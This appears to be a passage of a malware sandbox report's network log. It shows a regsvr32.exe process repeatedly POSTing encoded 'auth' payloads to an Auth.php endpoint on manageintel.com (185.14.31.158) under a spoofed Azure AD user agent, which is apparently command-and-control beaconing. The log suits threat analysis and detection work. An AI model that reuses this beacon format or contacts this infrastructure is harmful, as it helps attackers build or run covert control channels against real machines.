1	192.168.2.3	49761	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
10	192.168.2.3	49848	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:33:59.804485083 CET	14269	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:00.021991014 CET	14270	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:02 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
11	192.168.2.3	49849	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:00.202415943 CET	14271	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:00.459328890 CET	14271	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:02 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
12	192.168.2.3	49850	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:00.658077002 CET	14272	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:00.914897919 CET	14273	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:03 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49851	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:01.098141909 CET	14274	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:01.365734100 CET	14274	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:03 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49852	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:01.648149967 CET	14275	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:01.879401922 CET	14275	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:04 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49853	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:02.077996969 CET	14276	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:02.345707893 CET	14277	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:04 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49854	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:02.528935909 CET	14278	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:02.774950981 CET	14278	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:05 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
17	192.168.2.3	49855	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:34:02.932660103 CET	14279	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 245 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 4a 68 64 54 56 76 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 4c 43 4a 6a 51 6b 59 69 4f 69 4a 57 63 48 64 76 4d 58 5a 32 55 44 6b 79 61 46 4a 52 61 48 64 68 5a 58 70 71 5a 47 52 49 63 7a 30 69 4c 43 4a 6c 4d 44 4e 6c 5a 43 49 36 49 6c 56 50 56 6c 70 34 4e 6d 46 4e 4d 46 56 56 54 45 4e 59 57 6d 74 4e 51 53 74 75 5a 6d 31 6e 54 33 6c 4c 5a 7a 52 6c 59 54 6c 59 56 45 35 43 54 6c 4e 6c 54 46 52 44 5a 6c 6b 39 49 69 77 69 64 47 4a 6c 63 33 46 75 49 6a 6f 69 55 6b 74 57 63 6a 42 52 50 54 30 69 4c 43 4a 33 55 44 59 69 4f 69 4a 61 5a 54 52 79 62 79 74 49 55 69 49 73 49 6e 64 6e 61 6e 59 69 4f 69 4a 61 54 47 68 32 4e 57 63 39 50 53 4a 39 Data Ascii: auth=eyIzbTd4IjoiUnF4ZzRnPT0iLCJhdTVvIjoiY2UxeDhnPT0iLCJjQkYiOiJWcHdvMXZ2UDkyaFJRaHdhZXpqZGRIcz0iLCJlMDNlZCI6IlVPVlp4NmFNMFVVTENYWmtNQStuZm1nT3lLZzRlYTlYVE5CTlNlTFRDZlk9IiwidGJlc3FuIjoiUktWcjBRPT0iLCJ3UDYiOiJaZTRybytIUiIsIndnanYiOiJaTGh2NWc9PSJ9
Jan 30, 2022 13:34:03.160350084 CET	14280	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:34:05 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 28 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 59 32 55 78 65 44 68 6e 50 54 30 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiY2UxeDhnPT0ifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49764	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49841	185.14.31.158	443	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.3	49762	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:30:46.144690990 CET	2014	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 549 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 56 58 4a 30 62 79 74 68 52 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4c 64 57 74 33 63 57 5a 75 59 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 56 53 58 42 59 64 31 6c 48 63 44 52 33 50 54 30 69 4c 43 4a 55 51 55 31 6d 62 53 49 36 57 79 4a 58 53 58 52 36 4b 7a 55 72 61 7a 56 57 61 79 74 4c 64 7a 30 39 49 6c 30 73 49 6d 4e 43 52 69 49 36 49 6c 5a 77 64 32 38 78 64 6e 5a 51 4f 54 4a 6f 55 6c 46 6f 64 32 46 6c 65 6d 70 6b 5a 45 68 7a 50 53 49 73 49 6d 55 77 4d 32 56 6b 49 6a 6f 69 56 55 39 57 57 6e 67 32 59 55 30 77 56 56 56 4d 51 31 68 61 61 30 31 42 4b 32 35 6d 62 57 64 50 65 55 74 6e 4e 47 56 68 4f 56 68 55 54 6b 4a 4f 55 32 56 4d 56 45 4e 6d 57 54 30 69 4c 43 4a 6d 4d 57 52 68 49 6a 6f 69 56 44 52 4f 51 6a 46 61 65 58 41 30 56 31 56 7a 56 6e 67 77 52 32 5a 35 61 6b 68 43 5a 7a 51 39 49 69 77 69 64 31 41 32 49 6a 6f 69 57 6d 55 30 63 6d 38 72 53 46 49 69 4c 43 4a 33 5a 32 70 32 49 6a 6f 69 57 6b 78 6f 64 6a 56 6e 50 54 30 69 4c 43 4a 36 61 30 4d 33 49 6a 6f 69 49 6e 30 3d Data Ascii: auth=eyIzQ0VrIjoiV3JGeDlhUEs1d05jT1VWRkxGU2tmQllLM0xjYVNlZ1NESkpPVzR5V1E3M0wyRndqK24wPSIsIjNmZTExIjoiSys0OG9RPT0iLCIzbTd4IjoiVXJ0bythRT0iLCI1ZGViOWMiOiJLdWt3cWZuYiIsIkRTMngiOiJKZXNsMHFhVyIsIkVMaiI6IlVxbGcwcXFPM0VzUSIsIkVvNiI6IlhyNXg4YUU9IiwiRnRvIjoiSnc9PSIsIlE2WDYiOiJVSXBYd1lHcDR3PT0iLCJUQU1mbSI6WyJXSXR6KzUrazVWaytLdz09Il0sImNCRiI6IlZwd28xdnZQOTJoUlFod2FlempkZEhzPSIsImUwM2VkIjoiVU9WWng2YU0wVVVMQ1haa01BK25mbWdPeUtnNGVhOVhUTkJOU2VMVENmWT0iLCJmMWRhIjoiVDROQjFaeXA0V1VzVngwR2Z5akhCZzQ9Iiwid1A2IjoiWmU0cm8rSFIiLCJ3Z2p2IjoiWkxodjVnPT0iLCJ6a0M3IjoiIn0=
Jan 30, 2022 13:30:46.408647060 CET	2015	IN	HTTP/1.1 200 OK Date: Sun, 30 Jan 2022 12:30:48 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.1.0 X-Powered-By: PHP/8.1.0 Content-Length: 220 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 65 79 4a 6f 63 33 70 42 49 6a 6f 69 57 48 4a 77 62 7a 4e 4c 51 30 51 77 57 47 74 56 53 44 42 61 59 6b 4e 6f 54 31 56 57 51 54 30 39 49 69 77 69 62 6c 67 34 65 53 49 36 49 6b 6f 72 5a 7a 6b 35 63 57 35 52 5a 32 68 34 55 6b 63 77 4f 56 52 4c 4d 55 68 46 51 56 46 33 54 44 42 61 56 6a 6c 6d 59 58 64 4b 52 44 56 4b 53 6c 4e 4c 61 55 64 53 4e 6b 4e 6a 4d 45 56 53 55 69 49 73 49 6e 4a 4b 63 56 55 69 4f 69 4a 6c 4e 6e 52 34 4e 45 78 36 57 57 31 6e 56 56 4a 48 4d 46 4a 58 54 47 68 74 57 6c 67 77 64 47 52 72 54 6d 39 77 59 7a 5a 56 54 47 4a 6d 59 30 56 4a 57 6a 64 71 54 54 68 4c 56 6d 70 57 54 56 4d 34 4d 31 42 57 4d 30 64 68 64 31 4a 7a 56 30 67 69 66 51 3d 3d Data Ascii: eyJoc3pBIjoiWHJwbzNLQ0QwWGtVSDBaYkNoT1VWQT09Iiwiblg4eSI6IkorZzk5cW5RZ2h4UkcwOVRLMUhFQVF3TDBaVjlmYXdKRDVKSlNLaUdSNkNjMEVSUiIsInJKcVUiOiJlNnR4NEx6WW1nVVJHMFJXTGhtWlgwdGRrTm9wYzZVTGJmY0VJWjdqTThLVmpWTVM4M1BWM0dhd1JzV0gifQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.3	49843	185.14.31.158	32710	C:\Windows\SysWOW64\regsvr32.exe

Timestamp	kBytes transferred	Direction	Data
Jan 30, 2022 13:33:57.379771948 CET	14262	OUT	POST /WUzZRUBQje/Auth.php HTTP/1.1 User-Agent: Windows-AzureAD-Authentication-Provider/11.0 Host: manageintel.com Content-Length: 561 Content-Type: application/x-www-form-urlencoded Accept-Language: en-US Data Raw: 61 75 74 68 3d 65 79 49 7a 51 30 56 72 49 6a 6f 69 56 33 4a 47 65 44 6c 68 55 45 73 31 64 30 35 6a 54 31 56 57 52 6b 78 47 55 32 74 6d 51 6c 6c 4c 4d 30 78 6a 59 56 4e 6c 5a 31 4e 45 53 6b 70 50 56 7a 52 35 56 31 45 33 4d 30 77 79 52 6e 64 71 4b 32 34 77 50 53 49 73 49 6a 4e 6d 5a 54 45 78 49 6a 6f 69 53 79 73 30 4f 47 39 52 50 54 30 69 4c 43 49 7a 62 54 64 34 49 6a 6f 69 55 6e 46 34 5a 7a 52 6e 50 54 30 69 4c 43 49 31 5a 47 56 69 4f 57 4d 69 4f 69 4a 4c 64 57 74 33 63 57 5a 75 59 69 49 73 49 6b 52 54 4d 6e 67 69 4f 69 4a 4b 5a 58 4e 73 4d 48 46 68 56 79 49 73 49 6b 56 4d 61 69 49 36 49 6c 56 78 62 47 63 77 63 58 46 50 4d 30 56 7a 55 53 49 73 49 6b 56 76 4e 69 49 36 49 6c 68 79 4e 58 67 34 59 55 55 39 49 69 77 69 52 6e 52 76 49 6a 6f 69 53 6e 63 39 50 53 49 73 49 6c 45 32 57 44 59 69 4f 69 4a 57 4e 58 42 58 4d 6a 56 31 64 44 56 52 5a 45 78 54 65 48 68 71 5a 6d 74 32 51 69 49 73 49 6c 52 42 54 57 5a 74 49 6a 70 62 49 6c 64 4a 64 48 6f 72 4e 53 74 72 4e 56 5a 72 4b 30 74 33 50 54 30 69 58 53 77 69 59 30 4a 47 49 6a 6f 69 56 6e 42 33 62 7a 46 32 64 6c 41 35 4d 6d 68 53 55 57 68 33 59 57 56 36 61 6d 52 6b 53 48 4d 39 49 69 77 69 5a 54 41 7a 5a 57 51 69 4f 69 4a 56 54 31 5a 61 65 44 5a 68 54 54 42 56 56 55 78 44 57 46 70 72 54 55 45 72 62 6d 5a 74 5a 30 39 35 53 32 63 30 5a 57 45 35 57 46 52 4f 51 6b 35 54 5a 55 78 55 51 32 5a 5a 50 53 49 73 49 6d 59 78 5a 47 45 69 4f 69 4a 55 4e 45 35 43 4d 56 70 35 